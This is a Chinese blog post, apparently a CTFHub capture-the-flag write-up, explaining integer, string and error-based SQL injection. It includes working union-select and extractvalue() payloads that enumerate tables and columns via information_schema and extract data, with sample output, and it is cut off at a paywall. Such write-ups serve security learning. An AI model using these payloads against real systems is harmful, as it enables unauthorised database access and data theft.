sql注入基础(ctfhub sql注入)

最新推荐文章于 2024-03-26 22:07:50 发布
VIP文章 最新推荐文章于 2024-03-26 22:07:50 发布
阅读量739 收藏 3
点赞数 1
分类专栏: CTF SQL注入 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/kofi6/article/details/119708034
版权

sql注入基础(ctfhub sql注入)

0x00 前言

这两天在CTFHub上练题,刚好练到了SQL注入这个之前我一直也不是很懂,这回一做发现其中大有玄妙,所以就一起写个小总结。

CTFhHub:https://www.ctfhub.com/#/index

请添加图片描述
上面这张图是CTFHub的SQL注入技能树,我后面的内容大致会根据技能树上的内容进行分析。技能树上每个未划去的节点都有一个相对的题目,所以会依托题目的形式来分析。

0x01 整数型注入

分析题目

请添加图片描述
输入1后查看
在这里插入图片描述
出题人非常贴心的把查询语句也输出了出来,我们可以看到直接查询了id=1,这里的1是数字1,这个时候就可以使用联合查询注入了。

注入原理

在这里插入图片描述
可以发现,在原本的语句后面拼接一个union select就可以达到联合查询的效果,但是需要注意查询的列数需要相等,否则会报错。在这题当中并不需要注意,因为已经是相等的了,在某些题目当中需要使用limit函数来限制输出,这个后面有时间会写。
在这里只需要知道union可以实现联合注入查询就可以了。
这里需要知道,数据查询后,按行传递给服务器输出,我们将本地的查询语句稍微修改一下,就会发现原本的第一行不见了。那么此时第二行就会被服务器返回前端。只需要构造好代码,就可以查询数据库的所有内容了。

在这里插入图片描述

构造payload

首先是要让id错误,显然id不为负数,所以id=-1,又要让列数保持为2,所以union后接的第一个数为1。所以根据不同目的,payload为

爆出数据库名
-1 union select 1,databse()
>>>sqli
爆出表名
-1 union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()
>>>news,flag
爆出列名
-1 union select 1,group_concat(column_name) from information_schema.columns where table_name='flag'
>>>flag
爆出数据
-1 union select 1,flag from sqli.flag
>>>ctfhub{********************************}

至此,得到flag。

0x02 字符型注入

分析题目

提示输入1,那么输入1后可以看到,1被’包裹起来了,显然这是一个字符型查询。
在这里插入图片描述
再尝试输入-1=1,发现搜索id=’-1=1’,所以需要对前面的引号进行闭合,对后面的引号进行注释

注入原理

这里需要将后面的引号进行注释,最简单的办法就是使用#注释,当然也可以使用’对后面的引号闭合。但是使用’进行闭合在本地测试会报错。所以不建议使用这种方式,因为不保证稳定性。

payload构造

与上面一个题型类似,我们先要让查询的数字错误好使第一组数据为空,接着就是一步一步的命令注入。

查询数据库
-1' union select 1,database()#
>>>sqli
爆表名
-1' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database();#
>>>news,flag
爆列名
-1' union select 1,group_concat(column_name) from information_schema.columns where table_name='flag';#
>>>flag
爆数据
-1' union select 1,flag from sqli.flag;#
>>>ctfhub{
  ************************}

0x03 报错注入

题目分析

在这里插入图片描述
输入1,显然,本题仅返回查询是否成功。那么前面的注入技巧就失效了。因为无法直接通过联合查询查到内容。这里需要新的注入方式。

注入原理

先讲最简单的办法

这里可以使用一个叫extractvalue()的函数对命令进行注入。同样,这个函数的具体分析会在后面单独讲,这里只讲用法。

select extractvalue(null,concat(0x7e,(commond),0x7e))

这里的commond就是你要注入的命令了。
但是需要注意的是,这个函数最多只能返回32个字符,如果多了需要使用substring函数截取,使用方法如下

select extractvalue(null,concat(0x7e,(substring(commond),1,32),0x7e))

1和32分别为截取两段坐标,坐标从1开始。

另外还有一个更加通用的办法

那就是把这题当做布尔注入来做。具体操作方法看0x04布尔注入。因为布尔注入返回真或假,而报错注入同样返回查询成功(ture)和查询失败(false)。所以完全可以使用布尔注入来做。

可以这么认为,布尔注入是更特殊的报错注入,因为不会返回错误原因。

payload构造

这里就不再分析了,直接上代码,思路和上面几道题一模一样。

1 union select extractvalue(null,concat(0x7e,(select database()),0x7e))

>>>XPATH syntax error: '~sqli~' 

1 union select extractvalue(null,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_s
最低0.47元/天 解锁文章
kofi6
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
mysql&&sql注入+ctf+web安全
10-08
mysql&&sql注入+ctf+web安全
ctfhub技能树web--sql注入
m0_64636395的博客
05-15 734
SQL 注入是一种将 SQL 代码插入或添加到应用(用户)的输入参数中,之后再将这些参数传递给后台的 SQL 服务器加以解析并执行的攻击。攻击者能够修改 SQL 语句,该进程将与执行命令的组件(如数据库服务器、应用服务器或 WEB 服务器)拥有相同的权限。如果 WEB 应用开发人员无法确保在将从 WEB 表单、cookie、输入参数等收到的值传递给 SQL 查询(该查询在数据库服务器上执行)之前已经对其进行过验证,通常就会出现 SQL 注入漏洞。提示:以下是本篇文章正文内容,下面案例可供参考。
CTFHub-sql注入
qq_60905276的博客
01-30 5639
1.整数型注入 先判断有没有注入点 ?id=1 and 1=1 ?id=1 and 1=2 证明有注入点 在输入1看看。 有回显。
CTFHub ---> SQL注入!!
huohaowen的博客
02-27 1232
今天大一下ctfhubsql注入的靶场!!!
CTFHub技能树 Web-SQL注入详解
千寻的博客
11-21 1865
所谓SQL注入就是用户在能够控制SQL查询、更新、插入、删除等语句的参数的情况下,攻击者通过构造特殊的输入字符串使后端程序错误地识别SQL查询语句中的代码与数据部分从而导致数据库管理系统输出了非预期的结果的一种行为。
CTFHUB-SQL注入-报错注入
m0_64180167的博客
11-29 810
报错注入是在网站提供查询时进行SQL注入在用户输入了错误的信息时 网站进行报错处理但是提交的不进行审查 就会让代码随着报错指令进入目录。
CTFHUB技能树SQL注入
2401_82985722的博客
03-26 605
MySQL提供的 updatexml() 函数,当第二个参数包含特殊符号时会报错,并将第二个参数的内容显示在报错信息中。用group by(order by)判断查询列数,group by 2有回显 3无回显,证明字段数量为2列。修改2为version(),查看数据库版本,发现数据库版本为MariaDB 10.3.22。2-1回显与1一样,判断为数字型注入(不用考虑闭合符合)爆出flag数据表中的全部字段名,得到完整flag。2-1的回显界面与1不一样,判断为字符型注入。输入1时正常回显,输入1'时报错。
SQL注入基础.pdf
07-05
介绍SQL注入的原理,常见入侵与防御方式,手工注入或者工具注入
sql注入攻击流量情况
07-18
sql注入攻击流量情况
sql注入绕过方法总结
12-19
sql注入绕过方法总结,绕过waf,D盾
SQL注入漏洞演示源代码
07-15
SQL注入漏洞演示源代码 更多免费资源请查看:http://download.csdn.net/user/php_fly
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8241
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
端午送祝福语小程序源码(可对接流量主)
最新发布
05-26
该小程序的作用就是祝福语生成距离端午节也不远了,可以抓住机会蹭一波流量用户可以点击直接发送祝福语给好友 分享的时候会显示用。
基于Springboot微服务的车联网位置信息管理软件的设计与实现+论文
05-26
基于Spring Boot微服务的车联网位置信息管理软件旨在通过现代化技术提升车辆位置信息的实时监控与管理效率。以下是该系统的功能模块和技术实现的简要介绍: 系统功能模块 车辆定位与追踪:通过集成GPS等定位技术,实时获取车辆位置信息,并提供车辆追踪功能。 位置信息管理:存储、查询、更新车辆位置信息,支持历史轨迹回放和位置数据统计分析。 报警与预警:根据预设规则,对异常位置信息进行报警和预警,如超速、越界等。 用户管理:支持用户注册、登录、权限管理等操作,确保系统安全和数据保密。 技术实现 后端技术:采用Spring Boot框架构建微服务架构,利用Maven进行项目管理,确保系统的高性能和稳定性。 数据库:使用MySQL数据库存储车辆位置信息、用户数据等关键信息,支持高效的数据查询和统计分析。 定位技术:集成GPS等定位技术,实现车辆位置的实时获取和追踪。 前端技术:结合Vue.js等前端框架,构建直观、友好的用户界面,提供丰富的交互体验。 该系统通过Spring Boot微服务架构和现代化技术,实现了车联网位置信息的实时监控与管理,为车辆管理提供了有力的技术支持。
毕业设计MATLAB_SIFT特征提取.zip
05-26
毕业设计MATLAB_SIFT特征提取.zip
微信小程序-城市天气2小程序项目源码-原生开发框架-含效果截图示例.zip
05-26
微信小程序凭借其独特的优势,在移动应用市场中占据了一席之地。首先,微信小程序无需下载安装,用户通过微信即可直接使用,极大地降低了使用门槛。其次,小程序拥有与原生应用相近的用户体验,同时加载速度快,响应迅速,保证了良好的使用感受。此外,微信小程序还提供了丰富的API接口,支持开发者轻松接入微信支付、用户授权等功能,为开发者提供了更多的可能性。 微信小程序-项目源码-原生开发框架。想要快速打造爆款小程序吗?这里有一份原生开发框架的项目源码等你来探索!基于微信小程序的强大生态,这份源码将带你领略原生开发的魅力,实现快速迭代与高效开发。从用户授权到微信支付,从界面设计到功能实现,一切尽在掌握。赶快下载查看,让你的小程序项目在竞争激烈的市场中脱颖而出!
医师定期考核工作安排表.docx
05-26
医师定期考核工作安排表.docx
yolo学习导航.txt
05-26
yolov10
Golang_Go100个错误和如何避免它们.zip
05-26
Golang_Go100个错误和如何避免它们
ctfhub sql注入
10-09
CTFHub是一个CTF(Capture The Flag)竞赛平台,其中包含了各种类型的安全挑战,包括SQL注入SQL注入是一种常见的Web应用程序安全漏洞,攻击者可以利用它来绕过应用程序的身份验证、访问未授权的数据或执行恶意操作...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值